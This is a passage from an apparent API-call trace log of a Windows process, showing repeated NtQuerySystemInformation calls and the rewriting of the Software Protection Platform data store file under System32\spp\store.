(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.814] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.tmp" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80000002, hTemplateFile=0x0) returned 0x3a0 [0292.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.817] WriteFile (in: hFile=0x3a0, lpBuffer=0x269499c3e00*, nNumberOfBytesToWrite=0x6cb0, lpNumberOfBytesWritten=0xa78217d700, lpOverlapped=0x0 | out: lpBuffer=0x269499c3e00*, lpNumberOfBytesWritten=0xa78217d700*=0x6cb0, lpOverlapped=0x0) returned 1 [0292.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d730, Length=0x28, ResultLength=0x0) [0292.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.949] MoveFileExW (lpExistingFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.tmp" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.tmp"), lpNewFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.bak" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.bak"), dwFlags=0x9) returned 1 [0292.951] MoveFileExW (lpExistingFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.bak" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.bak"), lpNewFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat"), dwFlags=0x9) returned 1 [0292.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0292.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0293.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0293.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0293.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0293.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0293.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0293.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0293.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0293.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x28, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e730, Length=0x20, ResultLength=0x0) [0293.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0293.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.392] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0293.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0293.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0293.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0293.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0293.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0293.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0293.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x28, ResultLength=0x0) [0293.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0293.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0293.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0293.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e830, Length=0x20, ResultLength=0x0) [0293.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0293.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0293.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0293.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0293.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0293.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8f0, Length=0x20, ResultLength=0x0) [0293.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0293.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0293.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0293.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0293.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.501] NtQuerySystemInformation 